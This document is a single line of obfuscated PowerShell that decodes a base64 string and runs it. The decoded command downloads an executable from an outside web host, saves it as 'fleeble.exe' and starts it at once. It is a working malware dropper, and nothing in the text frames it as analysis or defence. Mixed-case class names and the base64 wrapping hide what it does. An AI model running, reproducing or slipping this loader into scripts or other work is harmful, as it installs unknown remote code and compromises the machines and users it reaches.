iex([sysTem.teXt.eNcODiNg]::UTF8.getStriNG([sYSTeM.COnVeRt]::FROMbase64sTring('CihOZXctT2JqZWN0IHNZU3RFTS5uZXQud2VCY0xJZU50KS5kb1dObG9BREZpTEUoJ2h0dHA6Ly93b3JsZG5pdC5jb20vYWJhLmV4ZScsJ2ZsZWVibGUuZXhlJyk7U3RhcnQtUHJvY2VzcyAnZmxlZWJsZS5leGUnCgo=')));exit

